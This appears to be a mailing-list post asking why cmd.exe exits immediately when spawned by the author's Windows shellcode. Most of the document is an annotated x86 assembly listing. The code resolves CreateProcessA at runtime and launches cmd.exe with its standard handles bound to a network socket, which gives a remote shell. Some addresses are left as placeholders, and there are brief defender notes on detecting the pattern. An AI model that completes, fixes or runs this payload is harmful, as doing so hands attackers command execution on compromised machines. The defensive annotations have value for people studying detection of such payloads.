('binary' encoding is not supported, stored as-is) In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n> I wrote a little piece of shellcode that should spawn a shell using a socket in %ebp, which will execute cmd.exe succesfully. The problem is that cmd.exe dies right away. Has anybody got an idear why ? The source (asm for linux) is included. Kind regards, Berend-Jan Wever

#-----------------------------------------------------------------------
# Reading of the listing below (GAS/AT&T syntax, 32-bit x86, Windows API
# target; the author says it was assembled on Linux). Control is expected
# to begin at EntryPoint, which sits at the bottom of the blob, not at
# Start. The -0xXXXXXX and 0xXX values are unfilled placeholders in the
# post, so the listing does not assemble as-is.
#
# Register roles:
#   %ebp = socket handle; becomes hStdInput/hStdOutput/hStdError of the child
#   %edi = cursor into the ','-delimited string table that follows End:
#          ("cmd.exe,kernel32.dll,CreateProcessA,")
#   %ebx = (negated) address of an import slot, fixed up by neg %ebx
#   %esi = pointer to the STARTUPINFO built on the stack
#   %eax = scratch; holds the resolved proc address before the final call
#
# Notes for defenders:
#   - CreateProcessA called with bInheritHandles = 1, dwFlags containing
#     STARTF_USESTDHANDLES, and all three std handles set to one socket
#     handle is the observable pattern here; it is a useful telemetry
#     check on process-creation events.
#   - MakeStringAndNegEbx patches the string table in place (it overwrites
#     each ',' with a NUL). If that table shares a page with the code, the
#     page must be writable; W^X / DEP policies deny exactly that.
#   - After the call the thread spins forever (InfinitLoop), so the parent
#     shows as a 100% CPU busy-wait.
#-----------------------------------------------------------------------
Start:

#-----------------------------------------------------------------------
# MakeStringAndNegEbx
# In:    %edi = start of a ','-terminated string, %ebx = negated address
# Out:   %edi = one byte past the ',', which is now a NUL; %ebx = -(%ebx)
# Clobb: %al, %ecx, flags
#-----------------------------------------------------------------------
MakeStringAndNegEbx:
mov $',', %al                   # scan byte = ','
xor %ecx, %ecx
dec %ecx                        # %ecx = -1: no length limit on the scan
repne scasb                     # advance %edi until the ',' is found
sub %al, -1(%edi)               # ',' - ',' = 0: write a NUL over the ','
neg %ebx                        # %ebx was stored negated; restore the real address
ret

#-----------------------------------------------------------------------
# GetLibraryAndProcAddress
# In:    %edi = "libName,procName,...", %ebx not used on entry
# Out:   %eax = GetProcAddress(LoadLibraryA(libName), procName)
#        %edi = past the ',' that followed procName
# Calls through two import slots whose addresses are left as -0xXXXXXX
# placeholders in the post (stdcall callees pop their own arguments).
#-----------------------------------------------------------------------
GetLibraryAndProcAddress: # {
push %edi                       # > libName
mov $-0xXXXXXX, %ebx            # placeholder: negated address of the LoadLibraryA slot
call MakeStringAndNegEbx        # NUL-terminate libName, %edi -> procName
call *(%ebx)                    # < %eax = LoadLibraryA(libName);
push %edi                       # > procName
push %eax                       # > libHandle
mov $-0xXXXXXX, %ebx            # placeholder: negated address of the GetProcAddress slot
call MakeStringAndNegEbx        # NUL-terminate procName, %edi -> next entry
call *(%ebx)                    # << %eax = GetProcAddress(libHandle, procName);
ret # }

#-----------------------------------------------------------------------
# main1 — never returns.
# In:    %ebp = socket handle; entered via `call main1` from EntryPoint,
#        so the pushed return address is the address of End:, i.e. the
#        start of the string table.
#-----------------------------------------------------------------------
main1: # %ebp = socket
pop %edi                        # < %edi = &strings (the return address == End:)
# Build a STARTUPINFO (0x44 bytes) on the stack, last field first.
xor %eax, %eax
push %ebp                       # HANDLE hStdError  = socket
push %ebp                       # HANDLE hStdOutput = socket
push %ebp                       # HANDLE hStdInput  = socket
push %eax                       # LPBYTE lpReserved2 = NULL
inc %eax                        # %eax = 1
push %eax                       # one dword covers two WORDs: wShowWindow = 1 (low), cbReserved2 = 0 (high)
mov %al, %ah                    # %eax = 0x0101
push %eax                       # DWORD dwFlags = STARTF_USESTDHANDLES (0x100) | STARTF_USESHOWWINDOW (0x1)
xor %eax, %eax
push %eax                       # DWORD dwFillAttribute = 0
push %eax                       # DWORD dwYCountChars = 0
push %eax                       # DWORD dwXCountChars = 0
push %eax                       # DWORD dwYSize = 0
push %eax                       # DWORD dwXSize = 0
push %eax                       # DWORD dwY = 0
push %eax                       # DWORD dwX = 0
push %eax                       # LPTSTR lpTitle = NULL
push %eax                       # LPTSTR lpDesktop = NULL (inherit)
push %eax                       # LPTSTR lpReserved = NULL
mov $0x44, %al
push %eax                       # DWORD cb = 0x44 = sizeof(STARTUPINFO); 17 pushes total
mov %esp, %esi                  # %esi = &StartupInfo
# Build a zeroed PROCESS_INFORMATION (4 dwords) on the stack.
xor %eax, %eax
push %eax                       # HANDLE hProcess
push %eax                       # HANDLE hThread
push %eax                       # DWORD dwProcessId
push %eax                       # DWORD dwThreadId
# CreateProcessA arguments, pushed right to left (stdcall).
push %esp                       # > lpProcessInformation -> the struct just built
push %esi                       # > lpStartupInfo -> stack
push %eax                       # > lpCurrentDirectory: NULL
push %eax                       # > lpEnvironment: NULL
push %eax                       # > dwCreationFlags: 0
inc %eax
push %eax                       # > bInheritHandles: 1 (TRUE) — needed for the socket to reach the child
dec %eax
push %eax                       # > lpThreadAttributes: NULL
push %eax                       # > lpProcessAttributes: NULL
push %edi                       # > lpCommandLine: &"cmd.exe" (still ','-terminated at this point)
push %eax                       # > lpApplicationName: NULL
call MakeStringAndNegEbx        # NUL-terminate the command line, %edi -> "kernel32.dll,..."
call GetLibraryAndProcAddress   # %eax = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateProcessA")
call *%eax                      # <<<<<<<<<< CreateProcessA(...); return value in %eax is not checked
InfinitLoop:
jmp InfinitLoop                 # busy-wait forever; the thread never exits
# Entry point of the blob: recover the socket handle from the stack, then
# call main1 so that the return address doubles as &strings.
EntryPoint:
lea 0xXX(%esp), %eax            # placeholder offset: where the caller left the socket on the stack
mov (%eax), %ebp                # %ebp = socket
call main1                      # pushes address of End: (== start of the string table)
End:

The code is followed by this string: "cmd.exe,kernel32.dll,CreateProcessA,"